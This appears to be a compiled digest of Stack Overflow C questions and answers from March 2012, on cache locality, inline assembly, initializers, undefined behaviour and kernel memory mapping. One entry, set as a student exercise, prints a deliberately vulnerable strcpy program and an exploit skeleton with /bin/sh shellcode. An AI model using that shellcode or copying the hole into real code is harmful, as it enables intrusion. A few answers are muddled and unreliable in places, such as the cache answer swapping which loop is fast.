Best c questions in March 2012

Why does the order of the loops affect performance when iterating over a 2D array?

83 votes

Possible Duplicate:
Which of these two for loops is more efficient in terms of time and cache performance

Below are two programs that are almost identical except that I switched the i and j variables around. They both run in different amounts of time. Could someone explain why this happens?

Version 1

#include <stdio.h>
#include <stdlib.h>

main () {
  int i,j;
  static int x[4000][4000];
  for (i = 0; i < 4000; i++) {
    for (j = 0; j < 4000; j++) {
      x[j][i] = i + j; }
  }
}

Version 2

#include <stdio.h>
#include <stdlib.h>

main () {
  int i,j;
  static int x[4000][4000];
  for (j = 0; j < 4000; j++) {
     for (i = 0; i < 4000; i++) {
       x[j][i] = i + j; }
   }
}

As others have said, the issue is the store to the memory location in the array: x[i][j]. Here's a bit of insight why:

You have a 2-dimensional array, but memory in the computer is inherently 1-dimensional. So while you imagine your array like this:

0,0 | 0,1 | 0,2 | 0,3
----+-----+-----+----
1,0 | 1,1 | 1,2 | 1,3
----+-----+-----+----
2,0 | 2,1 | 2,2 | 2,3

Your computer stores it in memory as a single line:

0,0 | 0,1 | 0,2 | 0,3 | 1,0 | 1,1 | 1,2 | 1,3 | 2,0 | 2,1 | 2,2 | 2,3

In the 2nd example, you access the array by looping over the 2nd number first, i.e.:

x[0][0] 
        x[0][1]
                x[0][2]
                        x[0][3]
                                x[1][0] etc...

Meaning that you're hitting them all in order. Now look at the 1st version. You're doing:

x[0][0]
                                x[1][0]
                                                                x[2][0]
        x[0][1]
                                        x[1][1] etc...

Because of the way C laid out the 2-d array in memory, you're asking it to jump all over the place. But now for the kicker: Why does this matter? All memory accesses are the same, right?

No: because of caches. Data from your memory gets brought over to the CPU in little chunks (called 'cache lines'), typically 64 bytes. If you have 4-byte integers, that means you're geting 16 consecutive integers in a neat little bundle. It's actually fairly slow to fetch these chunks of memory; your CPU can do a lot of work in the time it takes for a single cache line to load.

Now look back at the order of accesses: The first example is (1) grabbing a chunk of 16 ints, (2) modifying all of them, (3) repeat 4000*4000/16 times. That's nice and fast, and the CPU always has something to work on.

The second example is (1) grab a chunk of 16 ints, (2) modify only one of them, (3) repeat 4000*4000 times. That's going to require 16 times the number of "fetches" from memory. Your CPU will actually have to spend time sitting around waiting for that memory to show up, and while it's sitting around you're wasting valuable time.

Important Note:

Now that you have the answer, here's an interesting note: there's no inherent reason that your second example has to be the fast one. For instance, in Fortran, the first example would be fast and the second one slow. That's because instead of expanding things out into conceptual "rows" like C does, Fortran expands into "columns", i.e.:

0,0 | 1,0 | 2,0 | 0,1 | 1,1 | 2,1 | 0,2 | 1,2 | 2,2 | 0,3 | 1,3 | 2,3

The layout of C is called 'row-major' and Fortran's is called 'column-major'. As you can see, it's very important to know whether your programming language is row-major or column-major! Here's a link for more info: http://en.wikipedia.org/wiki/Row-major_order

Is inline assembly language slower than native C++ code?

61 votes

I tried to compare the performance of inline assembly language and C++ code, so I wrote a function that add two arrays of size 2000 for 100000 times. Here's the code:

#define TIMES 100000
void calcuC(int *x,int *y,int length)
{
    for(int i = 0; i < TIMES; i++)
    {
        for(int j = 0; j < length; j++)
            x[j] += y[j];
    }
}


void calcuAsm(int *x,int *y,int lengthOfArray)
{
    __asm
    {
        mov edi,TIMES
        start:
        mov esi,0
        mov ecx,lengthOfArray
        label:
        mov edx,x
        push edx
        mov eax,DWORD PTR [edx + esi*4]
        mov edx,y
        mov ebx,DWORD PTR [edx + esi*4]
        add eax,ebx
        pop edx
        mov [edx + esi*4],eax
        inc esi
        loop label
        dec edi
        cmp edi,0
        jnz start
    };
}

Here's main():

int main() {
    bool errorOccured = false;
    setbuf(stdout,NULL);
    int *xC,*xAsm,*yC,*yAsm;
    xC = new int[2000];
    xAsm = new int[2000];
    yC = new int[2000];
    yAsm = new int[2000];
    for(int i = 0; i < 2000; i++)
    {
        xC[i] = 0;
        xAsm[i] = 0;
        yC[i] = i;
        yAsm[i] = i;
    }
    time_t start = clock();
    calcuC(xC,yC,2000);

    //    calcuAsm(xAsm,yAsm,2000);
    //    for(int i = 0; i < 2000; i++)
    //    {
    //        if(xC[i] != xAsm[i])
    //        {
    //            cout<<"xC["<<i<<"]="<<xC[i]<<" "<<"xAsm["<<i<<"]="<<xAsm[i]<<endl;
    //            errorOccured = true;
    //            break;
    //        }
    //    }
    //    if(errorOccured)
    //        cout<<"Error occurs!"<<endl;
    //    else
    //        cout<<"Works fine!"<<endl;

    time_t end = clock();

    //    cout<<"time = "<<(float)(end - start) / CLOCKS_PER_SEC<<"\n";

    cout<<"time = "<<end - start<<endl;
    return 0;
}

Then I run the program five times to get the cycles of processor, which could be seen as time. Each time I call one of the function mentioned above only.

And here comes the result.

Function of assembly version:

Debug   Release
---------------
732        668
733        680
659        672
667        675
684        694
Average:   677

Function of C++ version:

Debug     Release
-----------------
1068      168
 999      166
1072      231
1002      166
1114      183
Average:  182

The C++ code in release mode is almost 3.7 times faster than the assembly code. Why?

I guess that the assembly code I wrote is not as effective as those generated by GCC. It's hard for a common programmer like me to wrote code faster than its opponent generated by a compiler.Does that mean I should not trust the performance of assembly language written by my hands, focus on C++ and forget about assembly language?

Yes, yes yes. Most times.

Compilers can do optimizations that most people can't even imagine (see this short list).
They can take in account inter-procedural optimization and whole-program optimization. Assembly programmer has to make well-defined functions with a well-defined call interface. This prevents many of the optimization methods that compilers use, such as register allocation, constant propagation, common subexpression elimination across functions, scheduling across functions, and other complex, not obvious optimizations (Polytope model, for example). It's not amazing, they can verify in one second what you'll need 2 days to calculate. On RISC architecture guys stopped to worry about this many years ago (Instruction Scheduling, for example, is very hard to tune by hand) and modern CISC CPUs have very long pipelines too.

For some complex microcontrollers even system libraries are written in C instead of assembly because their compilers produce a better (and easy to maintain) final code.

If you write something in assembly, I think you have to consider at least some simple optimizations (take a look at MasmCode. The school-book example for arrays is to unroll the cycle (its size is known at compile time). Do it and run your test again. It could demonstrate why your debug version is slower in pure C++ (no optimizations).
That said, modern compilers sometimes can automatically use some MMX/SIMDx instructions by themselves, and if you don't use them you simply can't compare (I'm not an assembly guru so I don't even try talk about code you wrote). Just for loops this is a short list of loop optimizations of what is common to check for a compiler (do you think you may do it by yourself when your schedules has been decided for a C# program?)

These days it's also really uncommon to need to use assembly language for another reason: the plethora of different CPUs! Do you want to support them all? Each has a specific micro-architecture and some specific instruction set. For small tasks (like this) the compiler usually does it better, and for complex tasks usually the work isn't repaid (and compiler may do better anyway).

You can always produce an example where handmade assembly code is better than compiled code but usually it's a fictional example or a single routine not a true program of 200.000+ lines of C++ code). I think compilers will produce better assembly code 95% times (moreover we don't have to forget that an assembler is a compiler too and it'll do optimizations) and sometimes and only some rare times you may need to write assembly code for few, short, highly used, performance critical routines.

What do square brackets mean in array initialization in C?

53 votes
static uint8_t togglecode[256] = {
    [0x3A] CAPSLOCK,
    [0x45] NUMLOCK,
    [0x46] SCROLLLOCK
};

What's the meaning of [0x3A] here? I have only learned statements like int a[2] = {1, 2};

It means initialise the n-th element of the array. The example you've given will mean that:

togglecode[0x3A] == CAPSLOCK
togglecode[0x45] == NUMLOCK
togglecode[0x46] == SCROLLLOCK

These are called "designated initializers", and are actually part of the C99 standard. However, the syntax without the = is not. From that page:

An alternative syntax for this which has been obsolete since GCC 2.5 but GCC still accepts is to write [index] before the element value, with no =.

What happens if I define a 0-size array in C/C++?

42 votes

Just curious, what actually happens if I define a zero-length array int array[0]; in code? GCC doesn't complain at all.

Sample Program

#include <stdio.h>

int main() {
    int arr[0];
    return 0;
}

Clarification

I'm actually trying to figure out if zero-length arrays initialised this way, instead of being pointed at like the variable length in Darhazer's comments, are optimised out or not.

This is because I have to release some code out into the wild, so I'm trying to figure out if I have to handle cases where the SIZE is defined as 0, which happens in some code with a statically defined int array[SIZE];

I was actually surprised that GCC does not complain, which led to my question. From the answers I've received, I believe the lack of a warning is largely due to supporting old code which has not been updated with the new [] syntax.

Because I was mainly wondering about the error, I am tagging Lundin's answer as correct (Nawaz's was first, but it wasn't as complete) -- the others were pointing out its actual use for tail-padded structures, while relevant, isn't exactly what I was looking for.

An array cannot have zero size.

ISO 9899:2011 6.7.6.2:

If the expression is a constant expression, it shall have a value greater than zero.

The above text is true both for a plain array (§1) and a VLA (§5). This is normative text in the C standard. A compiler is not allowed to implement it differently.

gcc -std=c99 -pedantic gives a warning for this, although it must actually give an error. This is incorrect compiler behavior, try compiling it with a strictly conforming C compiler.

Why is this valid C

Asked on Tue, 20 Mar 2012 by sharth c
34 votes

I came across this code on reddit. I would have thought that type conversions would have caused this to be invalid.

int a[3] = { { {1, 2}, {3, 4}, 5, 6 }, {7, 8}, {9}, 10 };

On clang, I get a few warnings about excessive elements and braces in a scalar initializer. But the contents of a is [1, 7, 9].

Is this actually legitimate, and if it is, could someone explain what exactly is going on?

The excess elements are just ignored. There are two parts of 6.7.8 Initialization that you care about. First, from paragraph 17:

Each brace-enclosed initializer list has an associated current object. When no designations are present, subobjects of the current object are initialized in order according to the type of the current object: array elements in increasing subscript order, structure members in declaration order, and the first named member of a union.

That one explains why you get 1, 7, and 9 - the current object gets set by those braces. Then as to why it doesn't care about the extras, from paragraph 20:

... only enough initializers from the list are taken to account for the elements or members of the subaggregate or the first member of the contained union; any remaining initializers are left to initialize the next element or member of the aggregate of which the current subaggregate or contained union is a part.

Library to check if two regular expressions are equal/isomorphic

25 votes

I need a library which will take in two regular expressions and determine whether they are isomorphic (i.e. match exactly the same set of strings or not) For example a|b is isomorphic to [ab]

As I understand it, a regular expression can be converted to an NFA which in some cases can be efficiently converted to a DFA. The DFA can then be converted to a minimal DFA, which, if I understand it correctly, is unique and so these minimal DFA's can then be compared for equality. I realize that not all regular expression NFA's can be efficently transformed into DFA's (especially when they were generate from Perl Regexps which are not truly "regular") in which case ideally the library would just return an error or some other indication that the conversion is not possible.

I see tons of articles and academic papers on-line about doing this (and even some programming assignments for classes asking students to do this) but I can't seem to find a library which implements this functionality. I would prefer a Python and/or C/C++ library, but a library in any language will do. Does anyone know if such a library? If not, does someone know of a library that gets close that I can use as a starting point?

Haven't tried it, but Regexp:Compare for Perl looks promising: two regex's are equivalent if the language of the first is a subset of the second, and vice verse.

What's the reason for letting the semantics of a=a++ be undefined?

20 votes
a = a++;

is undefined behaviour in C. The question I am asking is : why?

I mean, I get that it might be hard to provide a consistent order in which things should be done. But, certain compilers will always do it in one order or the other (at a given optimization level). So why exactly is this left up to the compiler to decide?

To be clear, I want to know if this was a design decision and if so, what prompted it? Or maybe there is a hardware limitation of some kind?

(Note : If the question title seems unclear or not good enough, then feedback and/or changes are welcome)

Why? I want to know if this was a design decision and if so, what prompted it?

You are essentially asking for the minutes of the meeting of the ANSI C design committee, and I don't have those handy. If your question can only be answered definitively by someone who was in the room that day, then you're going to have to find someone who was in that room.

However, I can answer a broader question:

What are some of the factors that lead a language design committee to leave the behaviour of a legal program (*) "undefined" or "implementation defined" (**)?

The first major factor is: are there two existing implementations of the language in the marketplace that disagree on the behaviour of a particular program? If FooCorp's compiler compiles M(A(), B()) as "call A, call B, call M", and BarCorp's compiler compiles it as "call B, call A, call M", and neither is the "obviously correct" behaviour then there is strong incentive to the language design committee to say "you're both right", and make it implementation defined behaviour. Particularly this is the case if FooCorp and BarCorp both have representatives on the committee.

The next major factor is: does the feature naturally present many different possibilities for implementation? For example, in C# the compiler's analysis of a "query comprehension" expression is specified as "do a syntactic transformation into an equivalent program that does not have query comprehensions, and then analyze that program normally". There is very little freedom for an implementation to do otherwise.

By contrast, the C# specification says that the foreach loop should be treated as the equivalent while loop inside a try block, but allows the implementation some flexibility. A C# compiler is permitted to say, for example "I know how to implement foreach loop semantics more efficiently over an array" and use the array's indexing feature rather than converting the array to a sequence as the specification suggests it should.

A third factor is: is the feature so complex that a detailed breakdown of its exact behaviour would be difficult or expensive to specify? The C# specification says very little indeed about how anonymous methods, lambda expressions, expression trees, dynamic calls, iterator blocks and async blocks are to be implemented; it merely describes the desired semantics and some restrictions on behaviour, and leaves the rest up to the implementation.

A fourth factor is: does the feature impose a high burden on the compiler to analyze? For example, in C# if you have:

Func<int, int> f1 = (int x)=>x + 1;
Func<int, int> f2 = (int x)=>x + 1;
bool b = object.ReferenceEquals(f1, f2);

Suppose we require b to be true. How are you going to determine when two functions are "the same"? Doing an "intensionality" analysis -- do the function bodies have the same content? -- is hard, and doing an "extensionality" analysis -- do the functions have the same results when given the same inputs? -- is even harder. A language specification committee should seek to minimize the number of open research problems that an implementation team has to solve!

In C# this is therefore left to be implementation-defined; a compiler can choose to make them reference equal or not at its discretion.

A fifth factor is: does the feature impose a high burden on the runtime environment?

For example, in C# dereferencing past the end of an array is well-defined; it produces an array-index-was-out-of-bounds exception. This feature can be implemented with a small -- not zero, but small -- cost at runtime. Calling an instance or virtual method with a null receiver is defined as producing a null-was-dereferenced exception; again, this can be implemented with a small, but non-zero cost. The benefit of eliminating the undefined behaviour pays for the small runtime cost.

A sixth factor is: does making the behaviour defined preclude some major optimization? For example, C# defines the ordering of side effects when observed from the thread that causes the side effects. But the behaviour of a program that observes side effects of one thread from another thread is implementation-defined except for a few "special" side effects. (Like a volatile write, or entering a lock.) If the C# language required that all threads observe the same side effects in the same order then we would have to restrict modern processors from doing their jobs efficiently; modern processors depend on out-of-order execution and sophisticated caching strategies to obtain their high level of performance.

Those are just a few factors that come to mind; there are of course many, many other factors that language design committees debate before making a feature "implementation defined" or "undefined".

Now let's return to your specific example.

The C# language does make that behaviour strictly defined(); the side effect of the increment is observed to happen before the side effect of the assignment. So there cannot be any "well, it's just impossible" argument there, because it is possible to choose a behaviour and stick to it. Nor does this preclude major opportunities for optimizations. And there are not a multiplicity of possible complex implementation strategies.

My guess, therefore, and I emphasize that this is a guess, is that the C language committee made ordering of side effects into implementation defined behaviour because there were multiple compilers in the marketplace that did it differently, none was clearly "more correct", and the committee was unwilling to tell half of them that they were wrong.


(*) Or, sometimes, its compiler! But let's ignore that factor.

(**) "Undefined" behaviour means that the code can do anything, including erasing your hard disk. The compiler is not required to generate code that has any particular behaviour, and not required to tell you that it is generating code with undefined behaviour. "Implementation defined" behaviour means that the compiler author is given considerable freedom in choice of implementation strategy, but is required to pick a strategy, use it consistently, and document that choice.

() When observed from a single thread, of course.

C library to parse approximate dates

17 votes

I'm looking for a plain C counterpart for date.js date.parse().

That is, something that understands "week ago" or "yesterday" as input. English-only is OK.

Note: a library should not be licensed under GPL, so Git's date.c or parser for GNU date -d wouldn't do. BTW, if you wonder why wouldn't I just sit down and code this, go and look at the source of mentioned libraries...

The following solution is not exactly what you've asked for but I hope that despite not being a plain C answer it will cover your needs. Reinventing the wheel isn't a way to go so let's use date.js in C by running it with SpiderMonkey, the Mozilla JavaScript engine.

Here's how I did it. I've begun with downloading date.js and translating it into a const char* named code defined in date.js.h.

( \
  echo 'const char *code =' ; \
  curl https://datejs.googlecode.com/files/date.js | \
    sed -e 's/\\/\\\\/g; s/"/\\"/g; s/^/"/; s/\r\?$/\\n"/'; \
  echo ';' \
) > date.js.h

Then I took the JSAPI's Hello, World! as a starting point.

#include "jsapi.h"
#include "date.js.h"

static JSClass global_class = { "global", JSCLASS_GLOBAL_FLAGS,
  JS_PropertyStub, JS_PropertyStub, JS_PropertyStub, JS_StrictPropertyStub,
  JS_EnumerateStub, JS_ResolveStub, JS_ConvertStub, JS_FinalizeStub,
  JSCLASS_NO_OPTIONAL_MEMBERS };

void reportError(JSContext *cx, const char *message, JSErrorReport *report) {
  fprintf(stderr, "%s:%u:%s\n",
      report->filename ? report->filename : "<no filename>",
      (unsigned int) report->lineno, message);
}

int main(int argc, const char *argv[]) {
  JSRuntime *rt;
  JSContext *cx;
  JSObject *global;
  rt = JS_NewRuntime(8L * 1024L * 1024L);
  if (rt == NULL) return 1;
  cx = JS_NewContext(rt, 8192);
  if (cx == NULL) return 1;
  JS_SetOptions(cx, JSOPTION_VAROBJFIX | JSOPTION_JIT | JSOPTION_METHODJIT);
  JS_SetVersion(cx, JSVERSION_LATEST);
  JS_SetErrorReporter(cx, reportError);
  global = JS_NewCompartmentAndGlobalObject(cx, &global_class, NULL);
  if (global == NULL) return 1;
  if (!JS_InitStandardClasses(cx, global)) return 1;

  /* Here's where the interesting stuff is starting to take place.
   * Begin by evaluating sources of date.js */

  jsval out;
  if (!JS_EvaluateScript(cx, global, code, strlen(code), "code", 1, &out))
    return 1;

  /* Now create a call to Date.parse and evaluate it. The return value should
   * be a timestamp of a given date. If no errors occur convert the timestamp
   * to a double and print it. */

  const int buflen = 1024;
  char parse[buflen + 1];
  snprintf(parse, buflen, "Date.parse(\"%s\").getTime();", argv[1]);

  if (!JS_EvaluateScript(cx, global, parse, strlen(parse), "parse", 1, &out))
    return 1;

  double val;
  JS_ValueToNumber(cx, out, &val);
  printf("%i\n", (int) (val / 1000));

  /* Finally, clean everything up. */

  JS_DestroyContext(cx);
  JS_DestroyRuntime(rt);
  JS_ShutDown();
  return 0;
}

Here's how it works in practice.

$ time ./parse "week ago"
1331938800
0.01user 0.00system 0:00.02elapsed 92%CPU (0avgtext+0avgdata 6168maxresident)k
0inputs+0outputs (0major+1651minor)pagefaults 0swaps
$ time ./parse yesterday
1332457200
0.01user 0.00system 0:00.02elapsed 84%CPU (0avgtext+0avgdata 6168maxresident)k
0inputs+0outputs (0major+1653minor)pagefaults 0swaps

As you can see it's quite fast and you could significantly increase its performance by reusing the initially created context for all subsequent calls to Date.parse.

Speaking of licensing issues, date.js is available under terms of MIT and SpiderMonkey is available under MPL 1.1, GPL 2.0 or LGPL 2.1. Linking it dynamically satisfies the non-GPL requirement.

TL;DR: git clone git://gist.github.com/2180739.git && cd 2180739 && make && ./parse yesterday

Strange expression

Asked on Fri, 23 Mar 2012 by din2 c
16 votes

I have found this line of code in a game that I study

int charaCode = arc4random() % (126-'!'+1)+'!';

I know what arc4random is but the expression is strange to me.

What is the purpose of

(126-'!'+1)+'!'

It always evaluates to 127.

You interpreted it wrong: the % operator has a higher precedence than +.

So, in effect, you have:

int charaCode = (arc4random() % (126-'!'+1))+'!';

which clips the function result to 0..93 and shifts it so that it starts with '!'.

So the effective range of what you get is 33..126 (which is the range of all visible ASCII characters from ! to ~).

Is it safe to return a struct in C/C++?

14 votes

What I understand is that this shouldnt be done, but I believe I've seen examples that do something like this (note code is not necessarily syntactically correct but the idea is there)

typedef struct{
    int a,b;
}mystruct;

And then here's a function

mystruct func(int c, int d){
    mystruct retval;
    retval.a = c;
    retval.b = d;
    return retval;
}

I undestood that we should always return a pointer to a malloc'ed struct if we want to do something like this, but I'm positive I've seen examples that do something like this. Is this correct? Personally I always either return a pointer to a malloc'ed struct or just do a pass by reference to the function and modify the values there. (Because my understanding is that once the scope of the function is over, whatever stack was used to allocate the structure can be overwritten).

Let's add a second part to the question: Does this vary by compiler? If it does, then what is the behavior for the latest versions of compilers for desktops: gcc, g++ and Visual Studio

Thoughts on the matter?

It's perfectly safe, and it's not wrong to do so. Also: it does not vary by compiler.

Usually, when your struct is not too big (like your example) I would argue that this approach is even better than returning a malloc'ed structure (malloc is an expensive operation).

Why does RegCloseKey exist (when CloseHandle seems to perform the same function)?

14 votes

I was looking at the docs for DuplicateHandle the other day and noticed that DuplicateHandle is able to copy registry key handles (HKEYs). Reading up on this a bit more in the SysInternals book seems to indicate that registry key handles are plain kernel objects, similar to file handles. Yet CloseHandle can't close HKEYs, and RegCloseKey can't close other kinds of kernel objects.

Why the distinction?

It is because only a part of the functionality of the registry is implemented in the kernel. It includes the basic operations (create, delete, read, write, etc.) for working with the local registry keys.

The remaining functions are implemented in the advapi32.dll and work in the user mode:

  • Access to a remote registry using RegConnectRegistry
  • Access to the HKEY_PERFORMANCE_DATA
  • Converting Win32 registry representation to Native representation
  • WOW64's registry redirection on 64-bit systems (for 32-bit applications)

The kernel part of the functionality is available through the Native API: NtCreateKey, NtOpenKey, etc. When comparing these functions with the Win32 API it can be seen that the Native API uses the "classical" HANDLE descriptors instead of HKEY.

How is this construct (int) { 1 } called?

Asked on Fri, 09 Mar 2012 by Sven c
13 votes

How is the construct (int) { 1 } called in C? A guess was "anonymous constant", but this didn't show any helpful on Google. As a sidenote, you can use this construct to tell ioctl that you want to use a variable with the value of 1: ioctl (..., &(int) { 1 }).

It's called a "compound literal" and constructs a temporary int-typed lvalue.

What happens when you logical not a float?

12 votes

I assume this just returns an int. Is there anything else going on I should be aware of? C/C++ differences?

float a = 2.5;
!a; // What does this return? Int? Float?

Regarding C++, quoting C++11 §5.3.1/9:

The operand of the logical negation operator ! is contextually converted to bool; its value is true if the converted operand is false and false otherwise. The type of the result is bool.

So what's really relevant here is the behavior of static_cast<bool>(some_float) – quoting §4.12/1:

A prvalue of arithmetic, unscoped enumeration, pointer, or pointer to member type can be converted to a prvalue of type bool. A zero value, null pointer value, or null member pointer value is converted to false; any other value is converted to true. A prvalue of type std::nullptr_t can be converted to a prvalue of type bool; the resulting value is false.

Putting those together, 2.5f is a non-zero value and will consequently evaluate to true, which when negated will evaluate to false. I.e., !a == false.


Regarding C, quoting C99 §6.5.3.3/5:

The result of the logical negation operator ! is 0 if the value of its operand compares unequal to 0, 1 if the value of its operand compares equal to 0. The result has type int. The expression !E is equivalent to (0==E).

I.e. the net result is the same as with C++, excepting the type.

How to align C for-loop body w/ GCC?

12 votes

In our embedded architecture we have a 64-bit IAB (Instruction Alignment Buffer). In order to optimize the fetch sequence, it is required that the body of a loop will start aligned to an 8-byte boundary.

It is easy to achieve this in assembly using the .balign directive, but I cannot find a syntax that will hint the C compiler to align the code.

Trying to precede the for loop with inline assembly with the .balign directive doesn't work as it aligns the for loop prolog (setup) and not the loop body itself.

Doing the same where the asm() line is inside the loop, adds nop-s to the loop body that cost precious cycles.

EDIT 1: assume the code:

    __asm__ volatile("nop");  
    __asm__ volatile("nop");  

    for (j0=0; j0<N; j0+=4)
    {
        c[j0+ 0] = a[j0+ 0] + b[j0+ 0];
        c[j0+ 1] = a[j0+ 1] + b[j0+ 1];
        c[j0+ 2] = a[j0+ 2] + b[j0+ 2];
        c[j0+ 3] = a[j0+ 3] + b[j0+ 3];
    }

I want the first c=a+b to be aligned to an 8-byte address. I can add the nop-s like above after a preliminary compilation, but this is an ad-hoc solution that will break with the 1st code change.

EDIT 2: Thanks to @R.., the solution is to use the -falign-loops=8 compiler option.

Umm, isn't this what GCC's -falign-loops option is for?

sorting 5d array in c

12 votes

I am trying to figure out how to sort a multidimensional data (5 dimensions) in C. I know that using a 5d array is a solution that, from reading others posts on SO about this topic many folks find, if not altogether unethical, so aesthetically repugnant so as to provoke unceasing projectile vomiting...so I apologize in advance.

Essentially I have an incoming set of data to which I must apply a series of discrete algorithms. Each algorithm has a set of variables, and I need to calculate a ranking of the efficiency of each algorithm with every permutation of the variables possible. Ultimately, I need a list sorted by the best-to-worst performing algorithm. The whole calculation is dynamic, so what works best on one incoming piece of data is unlikely to be the best performer on another...so I can't eliminate any of the variables because they are poor performers.

Here is how the data looks:

dataValue[ algo ][ lengthVar ][ durationVar ][ plasticityVar ] [ fungibilityVar]

There are:

  • 35 algorithms
  • 10 length variables
  • 230 duration vars
  • 27 plasticity vars
  • 400 fungibility vars

In addition to sorting by algorithm, I would like to have the flexibility to sort on any of the 5 dimensions.

This will be run on a 12 physical/ 24 logical core machine with 192 gig (not meg) of RAM, using VS 2010 C (not C++).

I am assuming that qsort would be the most efficient sorting option. I have searched Google and SO extensively for how to do this to no avail. There are answers for 1d arrays, multidimensional arrays in PHP or C#, etc, but not for C...or at least I can't find one.

I think you really need to refuse vomiting because of 5D effect. Make a struct instead:

typedef struct {
    int algorithm;
    int length;
    int duration;
    int plasticity;
    int fungibility;
    int dataValue;
} AlgorithmTestData;

And then define your test data 1D array:

AlgorithmTestData algoTestCases[NUMBER_OF_TEST_CASES];

or you can allocate it dynamically if you don't know the size of test cases with malloc.

Then you will qsort algoTestCases 1D array according to your comparision requirements.

Strange "half to even" rounding in different languages

11 votes

GNU bash, version 4.2.24:

$> printf "%.0f, %.0f\n" 48.5 49.5
48, 50

Ruby 1.8.7

> printf( "%.0f, %.0f\n", 48.5, 49.5 )
48, 50

Perl 5.12.4

$> perl -e 'printf( "%.0f, %.0f\n", 48.5, 49.5 )'
48, 50

gcc 4.5.3:

> printf( "%.0f, %.0f\n", 48.5, 49.5 );
48, 50

GHC, version 7.0.4:

> printf "%.0f, %.0f\n" 48.5 49.5
49, 50

Wikipedia says that this kind of rounding is called round half to even:

This is the default rounding mode used in IEEE 754 computing functions and operators.

Why is this rounding used by default in C, Perl, Ruby and bash, but not in Haskell?

Is it some sort of tradition or standard? And if it is a standard, why it's used by those languages and not used by Haskell? What is a point of rounding half to even?

GHCi> round 48.5
48
GHCi> round 49.5
50

The only difference is that printf isn't using round — presumably because it has to be able to round to more than just whole integers. I don't think IEEE 754 specifies anything about how to implement printf-style formatting functions, just rounding, which Haskell does correctly.

It would probably be best if printf was consistent with round and other languages' implementations, but I don't think it's really a big deal.

Exploiting a BufferOverflow

10 votes

I'm working on a project in which I'm supposed to write a C program to exploit the vulnerability of a given program.

Here is the vulnerable C program:

#include <stdlib.h>
#include <stdio.h>

int bof(char *str)
{
  char buffer[12];
  strcpy(buffer, str);
  return 1;
}

int main(int argc, char **argv)
{
  char str[517];
  FILE *badfile;
  badfile = fopen("badfile", "r");
  fread(str, sizeof(char), 517, badfile);
  bof(str);
  printf("Returned Properly\n");
  return 1;
}

And here is the code for exploit:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"  /* xorl  %eax,%eax   */
"\x50"      /* pushl %eax        */
"\x68""//sh"/* pushl $0x68732f2f */
"\x68""/bin"/* pushl $0x6e69622f */
"\x89\xe3"  /* movl  %esp,%ebx   */
"\x50"      /* pushl %eax        */
"\x53"      /* pushl %ebx        */
"\x89\xe1"  /* movl  %esp,%ecx   */
"\x99"      /* cdql              */
"\xb0\x0b"  /* movb  $0x0b,%al   */
"\xcd\x80"  /* int   $0x80       */
;

void main(int argc, char **argv)
{
   char buffer[517];
   FILE *badfile;

   /* Initialize buffer with 0x90 (NOP instruction) */
   memset(&buffer, 0x90, 517);

   /* Fill the buffer with appropriate contents here */

   /* Save the contents to the file "badfile" */
   badfile = fopen("./badfile", "w");
   fwrite(buffer, 517, 1, badfile);
   fclose(badfile);
}

So, I need to fill the buffer with appropriate contents before saving to the "badfile". I've read a lot about buffer overflows and I guess I need to modify the return address of the vulnerable program. But I really don't know how I'm supposed to do it. Shall I first find the original return address or is there something else that I can do? Also, any ideas/suggestions about how I'm supposed to implement the buffer?

I suggest reading the pages on Metasploit Unleashed, starting with this one. You can go through the associated ruby modules, to see what is actually going on, and port to C. While non trivial, it demonstrates the methods needed.

Also as others have suggested, using a debugger is important to figure out what is going on. Getting a decent one, such as cgdb, ddd, pyclewn, or gdb-mode, will make life much easier.

Does C code run faster?

7 votes

Is there any performance gain in calling C code from Objective-C?

I've read somewhere that message passing is slower compared to other languages that use function calling. So if I call a C function from Objective-C code, am I avoiding the messaging overhead?

When optimizing for performance, is it recommended practice to code the most critical functions and procedures in C instead of using Objective-C objects?

EDIT:
Given the ammount of answers warning about premature optimization and code readability, I want to clarify that I was not thinking on regular applications, but very specific ones such as:

  • Graphics
  • Encryption or compression algorithms.
  • Maths

And in general, fuctions or procedures that do not need OO design and are intended to be called many times with parameters.

This is a benchmark that compares messaging to calling C functions. Here are the results of calling different implementations of the fibonacci function about 1.4 billion times.

Message Passing 23.495 seconds
IMP Calling     16.033 seconds
C Function      9.709 seconds

So yes, there is some overhead when calling an Objective C method. But, except in some situations, this is not what will impact the performance of your app. In fact, messaging is still more efficient than most other operations such as floating-point division.

In addition, the majority apps spend most time waiting for user input, downloading data, etc.

How to map 1GB (or more) of physical memory

6 votes

I have a setup with 2GB of memory and I would like to map 1GB (or more) of physical memory into user space virtual address. It is in theory possible since with 32bits setup, 3GB of virtual address is available to user land apps.

I updated the kernel command line with the following parameters: mem=1G memmap=1G$1G to force the kernel to see 1GB of RAM and to reserve the last 1GB.

I have my custom driver that will handle the user space mmap() call and map the physical address 0x40000000 (1G) to user space address with the function remap_pfn_range(). But the function triggers a kernel BUG() in remap_pte_range(). The same call used to work with a 300MB remap instead of 1GB.

I usually use to call ioremap() in my driver to map physical address into kernel virtual address. In this case, I can't because of 1G/3G virtual addresses split (1G for kernel, 3G for apps). So I was wondering if it is possible to map physical address into user space virtual address without mapping these physical address in the kernel ?

Thanks in advance.

Why does your remap_pfn_range call trigger a kernel BUG()

The call to the BUG_ON macro in remap_pfn_range as per here

2277 BUG_ON(addr >= end);

remap_pfn_range calls remap_pud_range which calls remap_pmd_range which calls remap_pte_range.

Subsequent calls to BUG_ON or VM_BUG_ON from remap_pmd_range here

2191 VM_BUG_ON(pmd_trans_huge(*pmd));

and from remap_pte_range here

2171 BUG_ON(!pte_none(*pte));

BUG_ON macro is defined here

as

#define BUG_ON(condition) do { if (unlikely(condition)) BUG(); } while(0)

where BUG macro is defined above it to print a message and panic.

unlikely macro is defined here

as # define unlikely(x) (__builtin_expect(!!(x), 0)).

So when the target user address to start at addr is greater than or equal to end which is defined as end = addr + PAGE_ALIGN(size);, BUG_ON returns 1 and calls BUG.

Or when pmd_trans_huge as defined here

153 #ifdef CONFIG_TRANSPARENT_HUGEPAGE
154 static inline int pmd_trans_splitting(pmd_t pmd)
155 {
156         return pmd_val(pmd) & _PAGE_SPLITTING;
157 }
158 
159 static inline int pmd_trans_huge(pmd_t pmd)
160 {
161         return pmd_val(pmd) & _PAGE_PSE;
162 }
163 
164 static inline int has_transparent_hugepage(void)
165 {
166         return cpu_has_pse;
167 }

returns 0, this occurs when CONFIG_TRANSPARENT_HUGEPAGE isn't configured in the kernel or if the pmd (Page Metadate) value or & _PAGE_PSE

Or whenpte_none returns 1 if the corresponding entry does not exist and 0 if it exists.

